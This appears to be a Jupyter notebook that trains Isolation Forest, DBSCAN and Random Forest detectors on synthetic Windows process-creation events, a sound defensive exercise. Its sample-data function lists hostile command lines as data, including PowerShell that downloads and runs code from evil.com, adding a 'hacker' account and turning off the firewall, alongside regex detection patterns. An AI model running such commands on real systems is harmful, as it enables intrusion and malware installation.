# Security Anomaly Detection with Machine Learning

This notebook demonstrates advanced security analytics using machine learning techniques to identify anomalous behavior in security telemetry data collected from our environment.

## Techniques used:
- Time-series anomaly detection
- Clustering for behavior grouping
- Supervised classification for known attack pattern detection

**Author:** Your Name
**Date:** April 12, 2025

In [None]:
# Install required packages
%%sh
pip install --upgrade pandas numpy scikit-learn matplotlib seaborn plotly pyarrow azure-identity azure-storage-blob

## Setup Authentication with Azure Managed Identity

This notebook uses managed identity for secure, password-less authentication to Azure resources.

In [None]:
import os
import time
import pandas as pd
import numpy as np
from datetime import datetime, timedelta
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
import warnings
warnings.filterwarnings('ignore')

from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.ensemble import IsolationForest, RandomForestClassifier
from sklearn.cluster import DBSCAN
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, confusion_matrix

# For Azure authentication
from azure.identity import DefaultAzureCredential, ManagedIdentityCredential

print("Libraries imported successfully")

## Connect to Log Analytics using Managed Identity

We'll use managed identity to securely access our security logs in Log Analytics workspace.

In [None]:
# Define Azure credential strategy
def get_credential():
    """Get the appropriate credential based on environment"""
    try:
        # Try managed identity first (when running in Synapse)
        credential = ManagedIdentityCredential()
        print("Using managed identity for authentication")
        return credential
    except Exception as e:
        # Fall back to default credentials (dev environment)
        print(f"Managed identity not available ({e}), falling back to default credentials")
        return DefaultAzureCredential()

# Create credential object
credential = get_credential()

# Define workspace info (these values will be set through Synapse parameters)
workspace_id = "WORKSPACE_ID"  # This will be parameterized
log_analytics_endpoint = f"https://api.loganalytics.io/v1/workspaces/{workspace_id}"

## Query Security Telemetry Data

We'll query security process execution data from Log Analytics to build our anomaly detection model.

In [None]:
import requests
import json

def run_log_analytics_query(query):
    """Run a KQL query against Log Analytics using managed identity"""
    token = credential.get_token("https://api.loganalytics.io/.default")
    headers = {
        'Authorization': f'Bearer {token.token}',
        'Content-Type': 'application/json'
    }
    
    body = {
        'query': query
    }
    
    response = requests.post(
        f"{log_analytics_endpoint}/query",
        headers=headers,
        json=body
    )
    
    if response.status_code == 200:
        return response.json()
    else:
        print(f"Error: {response.status_code}\n{response.text}")
        return None

# Query process execution events from the last 7 days
query = """
let timeRange = 7d;
SecurityEvent
| where TimeGenerated > ago(timeRange)
| where EventID == 4688 // Process creation events
| project 
    TimeGenerated, 
    Computer, 
    Account, 
    ProcessName=NewProcessName,
    CommandLine=CommandLine,
    ParentProcessName,
    LogonId
// Simulate query for notebook display
"""

# In a real environment, we would execute the query
# results = run_log_analytics_query(query)
# df_process = pd.DataFrame(results['tables'][0]['rows'], columns=[col['name'] for col in results['tables'][0]['columns']])

# For the notebook demo, we'll create sample data
def generate_sample_process_data(n_samples=1000):
    """Generate sample process execution data for demonstration"""
    np.random.seed(42)
    
    # Common process names and parent processes
    process_names = ['cmd.exe', 'powershell.exe', 'explorer.exe', 'svchost.exe', 'chrome.exe', 
                     'outlook.exe', 'winword.exe', 'excel.exe', 'notepad.exe', 'regsvr32.exe']
    parent_processes = ['explorer.exe', 'services.exe', 'svchost.exe', 'cmd.exe', 'powershell.exe',
                       'winlogon.exe', 'lsass.exe', 'smss.exe']
    accounts = ['SYSTEM', 'NT AUTHORITY\\SYSTEM', 'DOMAIN\\user1', 'DOMAIN\\user2', 'DOMAIN\\admin']
    computers = ['WORKSTATION1', 'WORKSTATION2', 'SERVER1', 'SERVER2', 'LAPTOP1']
    
    # Command lines (including some suspicious ones)
    normal_cmds = [
        'cmd.exe /c dir', 
        'powershell.exe -Command "Get-Process"',
        'explorer.exe /select,C:\\Windows',
        'svchost.exe -k netsvcs',
        'cmd.exe /c echo "Hello"',
        'powershell.exe -Command "Get-Service"',
        'notepad.exe C:\\temp\\file.txt',
        'winword.exe "C:\\Documents\\report.docx"'
    ]
    
    suspicious_cmds = [
        'powershell.exe -enc JAAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0A',  # Encoded command
        'cmd.exe /c net user hacker Password123! /add',  # User creation
        'regsvr32.exe /s /u /i:evil.dll scrobj.dll',  # LOLBin usage
        'powershell.exe -Command "Invoke-WebRequest -Uri http://evil.com/mal.exe -OutFile C:\\temp\\legit.exe"', # Download
        'cmd.exe /c netsh advfirewall set allprofiles state off',  # Disable firewall
        'powershell.exe -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString(\"http://evil.com/script.ps1\")"' # Hidden download and execute
    ]
    
    # Time range for the past week
    end_time = datetime.now()
    start_time = end_time - timedelta(days=7)
    
    # Generate data
    data = []
    for i in range(n_samples):
        # Add a small number of suspicious commands (5%)
        is_suspicious = np.random.random() < 0.05
        
        # Select process details
        if is_suspicious:
            cmd = np.random.choice(suspicious_cmds)
            process = 'powershell.exe' if 'powershell' in cmd else ('cmd.exe' if 'cmd' in cmd else np.random.choice(process_names))
            parent = np.random.choice(['explorer.exe', 'services.exe', 'lsass.exe'])  # More likely to be from these
        else:
            process = np.random.choice(process_names)
            cmd = np.random.choice(normal_cmds) if process in ['cmd.exe', 'powershell.exe'] else process
            parent = np.random.choice(parent_processes)
        
        # Generate random timestamp in the past week
        random_seconds = np.random.randint(0, int((end_time - start_time).total_seconds()))
        event_time = start_time + timedelta(seconds=random_seconds)
        
        # Create event record
        data.append({
            'TimeGenerated': event_time.isoformat(),
            'Computer': np.random.choice(computers),
            'Account': np.random.choice(accounts),
            'ProcessName': process,
            'CommandLine': cmd,
            'ParentProcessName': parent,
            'LogonId': f"0x{np.random.randint(10000, 99999):x}",
            'IsKnownSuspicious': 1 if is_suspicious else 0  # Ground truth for testing
        })
    
    return pd.DataFrame(data)

# Generate sample data
df_process = generate_sample_process_data(2000)
df_process['TimeGenerated'] = pd.to_datetime(df_process['TimeGenerated'])

print(f"Loaded {len(df_process)} process execution events")
df_process.head()

## Data Preprocessing

Let's prepare the data for machine learning by extracting relevant features.

In [None]:
# Add engineered features
def extract_features(df):
    """Extract security-relevant features from process execution data"""
    # Command line length (suspicious commands are often long)
    df['CmdLength'] = df['CommandLine'].str.len()
    
    # Number of special characters (potential obfuscation)
    df['SpecialCharCount'] = df['CommandLine'].str.count(r'[^\w\s]')
    
    # Check for encoded commands (Base64 patterns)
    df['HasEncoding'] = df['CommandLine'].str.contains('-enc|-encoding|-e ', case=False, regex=True).astype(int)
    
    # Check for network indicators
    df['HasNetworkIOC'] = df['CommandLine'].str.contains('http|net |netsh|ftp:|wget|curl', case=False, regex=True).astype(int)
    
    # Check for file operations
    df['HasFileOps'] = df['CommandLine'].str.contains('copy |xcopy|move |del |erase|mkdir|rmdir|New-Item', case=False, regex=True).astype(int)
    
    # Check for privilege escalation attempts
    df['HasPrivEscIOC'] = df['CommandLine'].str.contains('runas|sudo|Administrator|add user|net user|Set-ExecutionPolicy|bypass', case=False, regex=True).astype(int)
    
    # Check for hidden window
    df['IsHiddenWindow'] = df['CommandLine'].str.contains('hidden|invisible|window hidden|-w hidden|-window h', case=False, regex=True).astype(int)
    
    # Check for unusual parent-child relationships
    unusual_parents = {
        'powershell.exe': ['lsass.exe', 'services.exe', 'smss.exe'],
        'cmd.exe': ['lsass.exe', 'services.exe', 'smss.exe'],
        'regsvr32.exe': ['powershell.exe', 'cmd.exe']
    }
    
    df['HasUnusualParent'] = 0
    for proc, parents in unusual_parents.items():
        mask = (df['ProcessName'] == proc) & (df['ParentProcessName'].isin(parents))
        df.loc[mask, 'HasUnusualParent'] = 1
    
    # SYSTEM account usage for user processes
    user_processes = ['chrome.exe', 'outlook.exe', 'winword.exe', 'excel.exe', 'notepad.exe']
    df['IsSystemOnUserProc'] = ((df['Account'].str.contains('SYSTEM')) & 
                               (df['ProcessName'].isin(user_processes))).astype(int)
    
    # Time features (hour of day can be relevant for some attacks)
    df['HourOfDay'] = df['TimeGenerated'].dt.hour
    
    # Weekend execution
    df['IsWeekend'] = df['TimeGenerated'].dt.dayofweek.isin([5, 6]).astype(int)
    
    return df

# Extract features
df_features = extract_features(df_process)

# Display the data with features
print(f"Data shape after feature extraction: {df_features.shape}")
df_features[['ProcessName', 'ParentProcessName', 'CmdLength', 'HasEncoding', 'HasNetworkIOC', 'HasUnusualParent', 'IsKnownSuspicious']].head(10)

## Exploratory Data Analysis

Let's visualize some patterns in our security telemetry.

In [None]:
# Set up plotting styles
plt.style.use('seaborn-darkgrid')
plt.rcParams['figure.figsize'] = (12, 8)

# Process distribution
plt.figure(figsize=(14, 6))
process_counts = df_features['ProcessName'].value_counts().head(10)
sns.barplot(x=process_counts.index, y=process_counts.values)
plt.title('Top 10 Processes by Frequency', fontsize=16)
plt.xticks(rotation=45)
plt.ylabel('Count')
plt.tight_layout()
plt.show()

# Command line length distribution
plt.figure(figsize=(14, 6))
sns.histplot(data=df_features, x='CmdLength', hue='IsKnownSuspicious', bins=30, alpha=0.6)
plt.title('Command Line Length Distribution', fontsize=16)
plt.xlabel('Command Length (characters)')
plt.ylabel('Frequency')
plt.legend(['Normal', 'Suspicious'])
plt.tight_layout()
plt.show()

# Feature correlation with suspiciousness
corr_columns = ['CmdLength', 'SpecialCharCount', 'HasEncoding', 'HasNetworkIOC', 
                'HasFileOps', 'HasPrivEscIOC', 'IsHiddenWindow', 
                'HasUnusualParent', 'IsSystemOnUserProc', 'IsWeekend', 'IsKnownSuspicious']

plt.figure(figsize=(12, 10))
corr_matrix = df_features[corr_columns].corr()
sns.heatmap(corr_matrix, annot=True, cmap='coolwarm', fmt='.2f', linewidths=0.5)
plt.title('Feature Correlation Matrix', fontsize=16)
plt.tight_layout()
plt.show()

# Time-based analysis
plt.figure(figsize=(14, 6))
time_series = df_features.groupby(df_features['TimeGenerated'].dt.floor('H')).size()
time_series_susp = df_features[df_features['IsKnownSuspicious']==1].groupby(
    df_features[df_features['IsKnownSuspicious']==1]['TimeGenerated'].dt.floor('H')).size()

plt.plot(time_series.index, time_series.values, label='All Events')
plt.plot(time_series_susp.index, time_series_susp.values, 'r-', label='Suspicious Events')
plt.title('Process Execution Events Over Time', fontsize=16)
plt.xlabel('Time')
plt.ylabel('Event Count')
plt.legend()
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()

## Approach 1: Isolation Forest for Anomaly Detection

Let's use an unsupervised learning approach to detect anomalies in process execution.

In [None]:
# Prepare features for Isolation Forest
numeric_features = ['CmdLength', 'SpecialCharCount', 'HourOfDay',
                    'HasEncoding', 'HasNetworkIOC', 'HasFileOps',
                    'HasPrivEscIOC', 'IsHiddenWindow', 'HasUnusualParent',
                    'IsSystemOnUserProc', 'IsWeekend']

categorical_features = ['ProcessName', 'ParentProcessName']

# Create preprocessing pipeline
numeric_transformer = Pipeline(steps=[
    ('scaler', StandardScaler())
])

categorical_transformer = Pipeline(steps=[
    ('onehot', OneHotEncoder(handle_unknown='ignore'))
])

preprocessor = ColumnTransformer(
    transformers=[
        ('num', numeric_transformer, numeric_features),
        ('cat', categorical_transformer, categorical_features)
    ])

# Create and train the Isolation Forest model
isolation_forest = Pipeline(steps=[('preprocessor', preprocessor),
                                  ('model', IsolationForest(contamination=0.05,  # Expect ~5% anomalies
                                                          random_state=42, 
                                                          n_estimators=100))])

# Fit the model
isolation_forest.fit(df_features[numeric_features + categorical_features])

# Get anomaly scores and predictions
# Anomaly score: negative = anomalous, more negative = more anomalous
anomaly_scores = isolation_forest.decision_function(df_features[numeric_features + categorical_features])
# Predictions: -1 = anomaly, 1 = normal
anomaly_predictions = isolation_forest.predict(df_features[numeric_features + categorical_features])

# Add predictions to dataframe
df_features['AnomalyScore'] = anomaly_scores
df_features['IsAnomaly'] = np.where(anomaly_predictions == -1, 1, 0)

# Compute detection accuracy (using our synthetic ground truth)
from sklearn.metrics import confusion_matrix, classification_report

print("\nIsolation Forest Performance:")
print(confusion_matrix(df_features['IsKnownSuspicious'], df_features['IsAnomaly']))
print("\n")
print(classification_report(df_features['IsKnownSuspicious'], df_features['IsAnomaly']))

## Approach 2: DBSCAN for Behavioral Clustering

Now let's identify clusters of similar behavior and analyze them for security implications.

In [None]:
# Prepare data for clustering
# We'll use the same preprocessing as before
features_preprocessed = preprocessor.fit_transform(df_features[numeric_features + categorical_features])

# Apply DBSCAN clustering
dbscan = DBSCAN(eps=1.0, min_samples=10)
clusters = dbscan.fit_predict(features_preprocessed)

# Add clusters to dataframe
df_features['Cluster'] = clusters

# Check distribution of clusters
cluster_counts = df_features['Cluster'].value_counts().sort_index()
print("\nCluster Distribution:")
print(cluster_counts)

# Check suspicious activity in each cluster
cluster_risk = df_features.groupby('Cluster')['IsKnownSuspicious'].mean().sort_values(ascending=False)
print("\nClusters by Risk Score (proportion of suspicious activity):")
print(cluster_risk)

# Visualize clusters vs. anomaly score (2D projection)
from sklearn.decomposition import PCA

# Reduce to 2D for visualization
pca = PCA(n_components=2)
features_2d = pca.fit_transform(features_preprocessed)

# Create visualization dataframe
viz_df = pd.DataFrame({
    'x': features_2d[:, 0],
    'y': features_2d[:, 1],
    'Cluster': clusters,
    'ProcessName': df_features['ProcessName'],
    'IsKnownSuspicious': df_features['IsKnownSuspicious'],
    'IsAnomaly': df_features['IsAnomaly']
})

# Plot clusters
plt.figure(figsize=(14, 10))

# Plot each cluster with a different color
colors = plt.cm.rainbow(np.linspace(0, 1, len(cluster_counts)))
for i, (cluster_id, color) in enumerate(zip(cluster_counts.index, colors)):
    # Noise points (cluster=-1) are black
    if cluster_id == -1:
        cluster_color = 'black'
        marker = 'x'
        label = 'Noise'
    else:
        cluster_color = color
        marker = 'o'
        label = f'Cluster {cluster_id}'
    
    cluster_points = viz_df[viz_df['Cluster'] == cluster_id]
    plt.scatter(cluster_points['x'], cluster_points['y'], c=[cluster_color], marker=marker, label=label, alpha=0.7)

# Mark known suspicious points with red circles
suspicious_points = viz_df[viz_df['IsKnownSuspicious'] == 1]
plt.scatter(suspicious_points['x'], suspicious_points['y'], edgecolors='red', facecolors='none', 
            s=100, linewidths=2, label='Known Suspicious')

plt.title('Behavioral Clusters of Process Execution Events', fontsize=16)
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.legend(loc='best')
plt.tight_layout()
plt.show()

# Find the highest risk clusters
high_risk_clusters = cluster_risk[cluster_risk > 0.2].index.tolist()
if high_risk_clusters:
    print("\nHigh Risk Cluster Analysis:")
    for cluster in high_risk_clusters:
        cluster_df = df_features[df_features['Cluster'] == cluster]
        print(f"\nCluster {cluster} - Risk Score: {cluster_risk[cluster]:.2f}, Size: {len(cluster_df)}")
        print("Top processes:")
        print(cluster_df['ProcessName'].value_counts().head(3))
        print("Sample commands:")
        print(cluster_df['CommandLine'].head(2).to_string())

## Approach 3: Supervised Classification

Now let's train a supervised model to predict suspicious behavior based on our labeled data.

In [None]:
# Prepare data for supervised learning
X = df_features[numeric_features + categorical_features]
y = df_features['IsKnownSuspicious']

# Split into train/test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42, stratify=y)

# Create the pipeline with preprocessing and the classifier
rf_pipeline = Pipeline([
    ('preprocessor', preprocessor),
    ('classifier', RandomForestClassifier(n_estimators=100, random_state=42))
])

# Train the model
rf_pipeline.fit(X_train, y_train)

# Evaluate the model
y_pred = rf_pipeline.predict(X_test)
y_pred_proba = rf_pipeline.predict_proba(X_test)[:, 1]

print("\nRandom Forest Classifier Performance:")
print(confusion_matrix(y_test, y_pred))
print("\n")
print(classification_report(y_test, y_pred))

# Plot feature importance
# Extract feature names after preprocessing
preprocessor.fit(X_train)
feature_names_onehot = preprocessor.transformers_[1][1]['onehot'].get_feature_names_out(categorical_features)
feature_names = numeric_features + list(feature_names_onehot)

# Extract and plot feature importances
importances = rf_pipeline.named_steps['classifier'].feature_importances_
indices = np.argsort(importances)[::-1]

# Take top 15 features
top_n = 15

plt.figure(figsize=(14, 8))
plt.title('Feature Importance for Suspicious Process Detection', fontsize=16)
plt.bar(range(top_n), importances[indices][:top_n], align='center')
plt.xticks(range(top_n), [feature_names[i] for i in indices][:top_n], rotation=90)
plt.tight_layout()
plt.show()

## Combining Models for Improved Detection

Now let's combine our models to create a more robust detection system.

In [None]:
# Apply our supervised model to the entire dataset
df_features['RF_Probability'] = rf_pipeline.predict_proba(X)[:, 1]
df_features['RF_Prediction'] = rf_pipeline.predict(X)

# Create a combined risk score
# 1. Normalize anomaly scores to 0-1 range (1 = more anomalous)
min_anomaly_score = df_features['AnomalyScore'].min()
max_anomaly_score = df_features['AnomalyScore'].max()
df_features['NormalizedAnomalyScore'] = 1 - ((df_features['AnomalyScore'] - min_anomaly_score) / 
                                           (max_anomaly_score - min_anomaly_score))

# 2. Combine the scores (anomaly detection + supervised prediction)
df_features['CombinedRiskScore'] = 0.4 * df_features['NormalizedAnomalyScore'] + 0.6 * df_features['RF_Probability']

# Set a threshold for high-risk events
risk_threshold = 0.7
df_features['IsHighRisk'] = (df_features['CombinedRiskScore'] >= risk_threshold).astype(int)

# Evaluate the combined approach
print("\nCombined Model Performance:")
print(confusion_matrix(df_features['IsKnownSuspicious'], df_features['IsHighRisk']))
print("\n")
print(classification_report(df_features['IsKnownSuspicious'], df_features['IsHighRisk']))

# Visualize the results
plt.figure(figsize=(14, 8))
plt.scatter(df_features['NormalizedAnomalyScore'], df_features['RF_Probability'], 
            c=df_features['IsKnownSuspicious'], cmap='coolwarm', alpha=0.7)

# Add a line for the risk threshold
x = np.linspace(0, 1, 100)
y = (risk_threshold - 0.4 * x) / 0.6
plt.plot(x, y, 'k--', label=f'Risk Threshold ({risk_threshold})')

plt.title('Combined Risk Assessment', fontsize=16)
plt.xlabel('Anomaly Score (Isolation Forest)')
plt.ylabel('Probability of Suspicious (Random Forest)')
plt.colorbar(label='Known Suspicious')
plt.legend()
plt.tight_layout()
plt.show()

# Display the highest risk events for analysis
high_risk_events = df_features[df_features['CombinedRiskScore'] >= 0.8].sort_values(
    by='CombinedRiskScore', ascending=False)
print("\nTop High-Risk Events:")
print(high_risk_events[['ProcessName', 'CommandLine', 'CombinedRiskScore', 
                        'IsKnownSuspicious']].head(10).to_string())

## Save Model for Production Use

Let's save our trained models for deployment in production.

In [None]:
import joblib
import os

# Create models directory if it doesn't exist
models_dir = './models'
os.makedirs(models_dir, exist_ok=True)

# Save the models
joblib.dump(isolation_forest, os.path.join(models_dir, 'isolation_forest_model.pkl'))
joblib.dump(rf_pipeline, os.path.join(models_dir, 'random_forest_model.pkl'))

print(f"Models saved to {models_dir}")

## Integration with Azure ML for Deployment

Now let's prepare for model deployment using Azure ML.

In [None]:
# This code would be used for Azure ML integration in a production environment
'''
from azureml.core import Workspace, Model, Environment
from azureml.core.model import InferenceConfig
from azureml.core.webservice import AciWebservice

# Connect to Azure ML workspace using managed identity
ws = Workspace.from_config()

# Register models
Model.register(workspace=ws, 
               model_path="./models/random_forest_model.pkl", 
               model_name="security_rf_model")

# Define scoring script (in a real scenario, this would be in a separate file)
%%writefile score.py
import joblib
import json
import numpy as np
import pandas as pd
from azureml.core.model import Model

def init():
    global rf_model
    model_path = Model.get_model_path("security_rf_model")
    rf_model = joblib.load(model_path)

def run(raw_data):
    try:
        # Parse input data
        data = json.loads(raw_data)
        input_df = pd.DataFrame(data)
        
        # Make prediction
        predictions = rf_model.predict_proba(input_df)[:, 1]
        
        # Return predictions
        return json.dumps({
            "predictions": predictions.tolist(),
            "risk_score": predictions.tolist(),
            "high_risk": (predictions >= 0.7).tolist()
        })
    except Exception as e:
        return json.dumps({"error": str(e)})
'''

## Conclusion and Next Steps

In this notebook, we've demonstrated how to apply machine learning techniques to detect suspicious activity in security telemetry data. We've used:

1. **Isolation Forest** for unsupervised anomaly detection
2. **DBSCAN** for behavioral clustering
3. **Random Forest** for supervised classification
4. A **combined approach** that leverages the strengths of multiple models

The models performed well on our sample data, achieving high accuracy in identifying suspicious process executions. In a production environment, these models would be deployed as part of a broader security monitoring system.

### Next Steps:

1. Deploy the models to Azure Functions or Azure ML for real-time scoring
2. Implement a feedback loop to improve model accuracy over time
3. Extend the analysis to include network and file system telemetry
4. Integrate with Azure Sentinel for holistic security monitoring
5. Implement alert management and response automation